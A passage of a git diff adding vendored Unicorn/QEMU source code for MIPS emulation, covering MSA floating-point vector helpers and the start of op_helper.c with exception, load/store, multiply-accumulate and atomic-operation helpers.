= &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_uint32_round_to_zero, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_uint64_round_to_zero, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], sqrt, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], sqrt, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_RECIPROCAL(DEST, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## div(FLOAT_ONE ## BITS, ARG, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, float ## BITS ## _is_infinity(ARG) || \ + float ## BITS ## _is_quiet_nan(DEST) ? \ + 0 : RECIPROCAL_INEXACT, \ + IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_frsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_RECIPROCAL(pwx->w[i], float32_sqrt(pws->w[i], + &env->active_tc.msa_fp_status), 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_RECIPROCAL(pwx->d[i], float64_sqrt(pws->d[i], + &env->active_tc.msa_fp_status), 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_frcp_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_RECIPROCAL(pwx->w[i], pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_RECIPROCAL(pwx->d[i], pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_frint_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], round_to_int, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], round_to_int, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_LOGB(DEST, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + set_float_rounding_mode(float_round_down, \ + &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## log2(ARG, \ + &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## round_to_int(DEST, \ + &env->active_tc.msa_fp_status); \ + set_float_rounding_mode(ieee_rm[(env->active_tc.msacsr & \ + MSACSR_RM_MASK) >> MSACSR_RM], \ + &env->active_tc.msa_fp_status); \ + \ + set_float_exception_flags( \ + get_float_exception_flags(&env->active_tc.msa_fp_status) \ + & (~float_flag_inexact), \ + &env->active_tc.msa_fp_status); \ + \ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_flog2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_LOGB(pwx->w[i], pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_LOGB(pwx->d[i], pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fexupl_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + /* Half precision floats come in two formats: standard + IEEE and "ARM" format. The latter gains extra exponent + range by omitting the NaN/Inf encodings. */ + flag ieee = 1; + + MSA_FLOAT_BINOP(pwx->w[i], from_float16, Lh(pws, i), ieee, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_float32, Lw(pws, i), 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_fexupr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + /* Half precision floats come in two formats: standard + IEEE and "ARM" format. The latter gains extra exponent + range by omitting the NaN/Inf encodings. */ + flag ieee = 1; + + MSA_FLOAT_BINOP(pwx->w[i], from_float16, Rh(pws, i), ieee, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_float32, Rw(pws, i), 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_ffql_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_q16, Lh(pws, i), 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_q32, Lw(pws, i), 64); + } + break; + default: + assert(0); + } + + msa_move_v(pwd, pwx); +} + +void helper_msa_ffqr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_q16, Rh(pws, i), 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_q32, Rw(pws, i), 64); + } + break; + default: + assert(0); + } + + msa_move_v(pwd, pwx); +} + +void helper_msa_ftint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_int32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_int64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_ftint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_uint32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_uint64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define float32_from_int32 int32_to_float32 +#define float32_from_uint32 uint32_to_float32 + +#define float64_from_int64 int64_to_float64 +#define float64_from_uint64 uint64_to_float64 + +void helper_msa_ffint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_int32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_int64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_ffint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_uint32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_uint64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/op_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/op_helper.c new file mode 100644 index 0000000..0855d8a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/op_helper.c @@ -0,0 +1,3713 @@ +/* + * MIPS emulation helpers for qemu. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include "cpu.h" +#include "qemu/host-utils.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#ifndef CONFIG_USER_ONLY +static inline void cpu_mips_tlb_flush (CPUMIPSState *env, int flush_global); +#endif + +/*****************************************************************************/ +/* Exceptions processing helpers */ + +static inline void QEMU_NORETURN do_raise_exception_err(CPUMIPSState *env, + uint32_t exception, + int error_code, + uintptr_t pc) +{ + CPUState *cs = CPU(mips_env_get_cpu(env)); + + if (exception < EXCP_SC) { + qemu_log("%s: %d %d\n", __func__, exception, error_code); + } + cs->exception_index = exception; + env->error_code = error_code; + + if (pc) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, pc); + } + + if (exception == 0x11) { + env->uc->next_pc = env->active_tc.PC + 4; + } + + cpu_loop_exit(cs); +} + +static inline void QEMU_NORETURN do_raise_exception(CPUMIPSState *env, + uint32_t exception, + uintptr_t pc) +{ + do_raise_exception_err(env, exception, 0, pc); +} + +void helper_raise_exception_err(CPUMIPSState *env, uint32_t exception, + int error_code) +{ + do_raise_exception_err(env, exception, error_code, 0); +} + +void helper_raise_exception(CPUMIPSState *env, uint32_t exception) +{ + do_raise_exception(env, exception, 0); +} + +#if defined(CONFIG_USER_ONLY) +#define HELPER_LD(name, insn, type) \ +static inline type do_##name(CPUMIPSState *env, target_ulong addr, \ + int mem_idx) \ +{ \ + return (type) insn##_raw(addr); \ +} +#else +#define HELPER_LD(name, insn, type) \ +static inline type do_##name(CPUMIPSState *env, target_ulong addr, \ + int mem_idx) \ +{ \ + switch (mem_idx) \ + { \ + case 0: return (type) cpu_##insn##_kernel(env, addr); break; \ + case 1: return (type) cpu_##insn##_super(env, addr); break; \ + default: \ + case 2: return (type) cpu_##insn##_user(env, addr); break; \ + } \ +} +#endif +HELPER_LD(lbu, ldub, uint8_t) +HELPER_LD(lhu, lduw, uint16_t) +HELPER_LD(lw, ldl, int32_t) +HELPER_LD(ld, ldq, int64_t) +#undef HELPER_LD + +#if defined(CONFIG_USER_ONLY) +#define HELPER_ST(name, insn, type) \ +static inline void do_##name(CPUMIPSState *env, target_ulong addr, \ + type val, int mem_idx) \ +{ \ + insn##_raw(addr, val); \ +} +#else +#define HELPER_ST(name, insn, type) \ +static inline void do_##name(CPUMIPSState *env, target_ulong addr, \ + type val, int mem_idx) \ +{ \ + switch (mem_idx) \ + { \ + case 0: cpu_##insn##_kernel(env, addr, val); break; \ + case 1: cpu_##insn##_super(env, addr, val); break; \ + default: \ + case 2: cpu_##insn##_user(env, addr, val); break; \ + } \ +} +#endif +HELPER_ST(sb, stb, uint8_t) +HELPER_ST(sh, stw, uint16_t) +HELPER_ST(sw, stl, uint32_t) +HELPER_ST(sd, stq, uint64_t) +#undef HELPER_ST + +target_ulong helper_clo (target_ulong arg1) +{ + return clo32(arg1); +} + +target_ulong helper_clz (target_ulong arg1) +{ + return clz32(arg1); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_dclo (target_ulong arg1) +{ + return clo64(arg1); +} + +target_ulong helper_dclz (target_ulong arg1) +{ + return clz64(arg1); +} +#endif /* TARGET_MIPS64 */ + +/* 64 bits arithmetic for 32 bits hosts */ +static inline uint64_t get_HILO(CPUMIPSState *env) +{ + return ((uint64_t)(env->active_tc.HI[0]) << 32) | (uint32_t)env->active_tc.LO[0]; +} + +static inline target_ulong set_HIT0_LO(CPUMIPSState *env, uint64_t HILO) +{ + target_ulong tmp; + env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); + tmp = env->active_tc.HI[0] = (int32_t)(HILO >> 32); + return tmp; +} + +static inline target_ulong set_HI_LOT0(CPUMIPSState *env, uint64_t HILO) +{ + target_ulong tmp = env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); + env->active_tc.HI[0] = (int32_t)(HILO >> 32); + return tmp; +} + +/* Multiplication variants of the vr54xx. */ +target_ulong helper_muls(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HI_LOT0(env, 0 - ((int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2)); +} + +target_ulong helper_mulsu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HI_LOT0(env, 0 - (uint64_t)(uint32_t)arg1 * + (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_macc(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HI_LOT0(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2); +} + +target_ulong helper_macchi(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2); +} + +target_ulong helper_maccu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HI_LOT0(env, (uint64_t)get_HILO(env) + + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_macchiu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (uint64_t)get_HILO(env) + + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_msac(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HI_LOT0(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2); +} + +target_ulong helper_msachi(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2); +} + +target_ulong helper_msacu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HI_LOT0(env, (uint64_t)get_HILO(env) - + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_msachiu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (uint64_t)get_HILO(env) - + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_mulhi(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); +} + +target_ulong helper_mulhiu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (uint64_t)(uint32_t)arg1 * + (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_mulshi(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, 0 - (int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2); +} + +target_ulong helper_mulshiu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, 0 - (uint64_t)(uint32_t)arg1 * + (uint64_t)(uint32_t)arg2); +} + +static inline target_ulong bitswap(target_ulong v) +{ + v = ((v >> 1) & (target_ulong)0x5555555555555555ULL) | + ((v & (target_ulong)0x5555555555555555ULL) << 1); + v = ((v >> 2) & (target_ulong)0x3333333333333333ULL) | + ((v & (target_ulong)0x3333333333333333ULL) << 2); + v = ((v >> 4) & (target_ulong)0x0F0F0F0F0F0F0F0FULL) | + ((v & (target_ulong)0x0F0F0F0F0F0F0F0FULL) << 4); + return v; +} + +#ifdef TARGET_MIPS64 +target_ulong helper_dbitswap(target_ulong rt) +{ + return bitswap(rt); +} +#endif + +target_ulong helper_bitswap(target_ulong rt) +{ + return (int32_t)bitswap(rt); +} + +#ifndef CONFIG_USER_ONLY + +static inline hwaddr do_translate_address(CPUMIPSState *env, + target_ulong address, + int rw) +{ + hwaddr lladdr; + + lladdr = cpu_mips_translate_address(env, address, rw); + + if (lladdr == -1LL) { + cpu_loop_exit(CPU(mips_env_get_cpu(env))); + } else { + return lladdr; + } +} + +#define HELPER_LD_ATOMIC(name, insn) \ +target_ulong helper_##name(CPUMIPSState *env, target_ulong arg, int mem_idx) \ +{ \ + env->lladdr = do_translate_address(env, arg, 0); \ + env->llval = do_##insn(env, arg, mem_idx); \ + return env->llval; \ +} +HELPER_LD_ATOMIC(ll, lw) +#ifdef TARGET_MIPS64 +HELPER_LD_ATOMIC(lld, ld) +#endif +#undef HELPER_LD_ATOMIC + +#define HELPER_ST_ATOMIC(name, ld_insn, st_insn, almask) \ +target_ulong helper_##name(CPUMIPSState *env, target_ulong arg1, \ + target_ulong arg2, int mem_idx) \ +{ \ + target_long tmp; \ + \ + if (arg2 & almask) { \ + env->CP0_BadVAddr = arg2; \ + helper_raise_exception(env, EXCP_AdES); \ + } \ + if (do_translate_address(env, arg2, 1) == env->lladdr) { \ + tmp = do_##ld_insn(env, arg2, mem_idx); \ + if (tmp == env->llval) { \ + do_##st_insn(env, arg2, arg1, mem_idx); \ + return 1; \ + } \ + } \ + return 0; \ +} +HELPER_ST_ATOMIC(sc, lw, sw, 0x3) +#ifdef TARGET_MIPS64 +HELPER_ST_ATOMIC(scd, ld, sd, 0x7) +#endif +#undef HELPER_ST_ATOMIC +#endif + +#ifdef TARGET_WORDS_BIGENDIAN +#define GET_LMASK(v) ((v) & 3) +#define GET_OFFSET(addr, offset) (addr + (offset)) +#else +#define GET_LMASK(v) (((v) & 3) ^ 3) +#define GET_OFFSET(addr, offset) (addr - (offset)) +#endif + +void helper_swl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)(arg1 >> 24), mem_idx); + + if (GET_LMASK(arg2) <= 2) + do_sb(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK(arg2) <= 1) + do_sb(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK(arg2) == 0) + do_sb(env, GET_OFFSET(arg2, 3), (uint8_t)arg1, mem_idx); +} + +void helper_swr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)arg1, mem_idx); + + if (GET_LMASK(arg2) >= 1) + do_sb(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK(arg2) >= 2) + do_sb(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK(arg2) == 3) + do_sb(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx); +} + +#if defined(TARGET_MIPS64) +/* "half" load and stores. We must do the memory access inline, + or fault handling won't work. */ + +#ifdef TARGET_WORDS_BIGENDIAN +#define GET_LMASK64(v) ((v) & 7) +#else +#define GET_LMASK64(v) (((v) & 7) ^ 7) +#endif + +void helper_sdl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)(arg1 >> 56), mem_idx); + + if (GET_LMASK64(arg2) <= 6) + do_sb(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 48), mem_idx); + + if (GET_LMASK64(arg2) <= 5) + do_sb(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 40), mem_idx); + + if (GET_LMASK64(arg2) <= 4) + do_sb(env, GET_OFFSET(arg2, 3), (uint8_t)(arg1 >> 32), mem_idx); + + if (GET_LMASK64(arg2) <= 3) + do_sb(env, GET_OFFSET(arg2, 4), (uint8_t)(arg1 >> 24), mem_idx); + + if (GET_LMASK64(arg2) <= 2) + do_sb(env, GET_OFFSET(arg2, 5), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK64(arg2) <= 1) + do_sb(env, GET_OFFSET(arg2, 6), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK64(arg2) <= 0) + do_sb(env, GET_OFFSET(arg2, 7), (uint8_t)arg1, mem_idx); +} + +void helper_sdr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)arg1, mem_idx); + + if (GET_LMASK64(arg2) >= 1) + do_sb(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK64(arg2) >= 2) + do_sb(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK64(arg2) >= 3) + do_sb(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx); + + if (GET_LMASK64(arg2) >= 4) + do_sb(env, GET_OFFSET(arg2, -4), (uint8_t)(arg1 >> 32), mem_idx); + + if (GET_LMASK64(arg2) >= 5) + do_sb(env, GET_OFFSET(arg2, -5), (uint8_t)(arg1 >> 40), mem_idx); + + if (GET_LMASK64(arg2) >= 6) + do_sb(env, GET_OFFSET(arg2, -6), (uint8_t)(arg1 >> 48), mem_idx); + + if (GET_LMASK64(arg2) == 7) + do_sb(env, GET_OFFSET(arg2, -7), (uint8_t)(arg1 >> 56), mem_idx); +} +#endif /* TARGET_MIPS64 */ + +static const int multiple_regs[] = { 16, 17, 18, 19, 20, 21, 22, 23, 30 }; + +void helper_lwm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, + uint32_t mem_idx) +{ + target_ulong base_reglist = reglist & 0xf; + target_ulong do_r31 = reglist & 0x10; + + if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) { + target_ulong i; + + for (i = 0; i < base_reglist; i++) { + env->active_tc.gpr[multiple_regs[i]] = + (target_long)do_lw(env, addr, mem_idx); + addr += 4; + } + } + + if (do_r31) { + env->active_tc.gpr[31] = (target_long)do_lw(env, addr, mem_idx); + } +} + +void helper_swm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, + uint32_t mem_idx) +{ + target_ulong base_reglist = reglist & 0xf; + target_ulong do_r31 = reglist & 0x10; + + if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) { + target_ulong i; + + for (i = 0; i < base_reglist; i++) { + do_sw(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx); + addr += 4; + } + } + + if (do_r31) { + do_sw(env, addr, env->active_tc.gpr[31], mem_idx); + } +} + +#if defined(TARGET_MIPS64) +void helper_ldm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, + uint32_t mem_idx) +{ + target_ulong base_reglist = reglist & 0xf; + target_ulong do_r31 = reglist & 0x10; + + if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) { + target_ulong i; + + for (i = 0; i < base_reglist; i++) { + env->active_tc.gpr[multiple_regs[i]] = do_ld(env, addr, mem_idx); + addr += 8; + } + } + + if (do_r31) { + env->active_tc.gpr[31] = do_ld(env, addr, mem_idx); + } +} + +void helper_sdm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, + uint32_t mem_idx) +{ + target_ulong base_reglist = reglist & 0xf; + target_ulong do_r31 = reglist & 0x10; + + if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) { + target_ulong i; + + for (i = 0; i < base_reglist; i++) { + do_sd(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx); + addr += 8; + } + } + + if (do_r31) { + do_sd(env, addr, env->active_tc.gpr[31], mem_idx); + } +} +#endif + +#ifndef CONFIG_USER_ONLY +/* SMP helpers. */ +static bool mips_vpe_is_wfi(MIPSCPU *c) +{ + CPUState *cpu = CPU(c); + CPUMIPSState *env = &c->env; + + /* If the VPE is halted but otherwise active, it means it's waiting for + an interrupt. */ + return cpu->halted && mips_vpe_active(env); +} + +static inline void mips_vpe_wake(MIPSCPU *c) +{ + /* Dont set ->halted = 0 directly, let it be done via cpu_has_work + because there might be other conditions that state that c should + be sleeping. */ + cpu_interrupt(CPU(c), CPU_INTERRUPT_WAKE); +} + +static inline void mips_vpe_sleep(MIPSCPU *cpu) +{ + CPUState *cs = CPU(cpu); + + /* The VPE was shut off, really go to bed. + Reset any old _WAKE requests. */ + cs->halted = 1; + cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); +} + +static inline void mips_tc_wake(MIPSCPU *cpu, int tc) +{ + CPUMIPSState *c = &cpu->env; + + /* FIXME: TC reschedule. */ + if (mips_vpe_active(c) && !mips_vpe_is_wfi(cpu)) { + mips_vpe_wake(cpu); + } +} + +static inline void mips_tc_sleep(MIPSCPU *cpu, int tc) +{ + CPUMIPSState *c = &cpu->env; + + /* FIXME: TC reschedule. */ + if (!mips_vpe_active(c)) { + mips_vpe_sleep(cpu); + } +} + +/** + 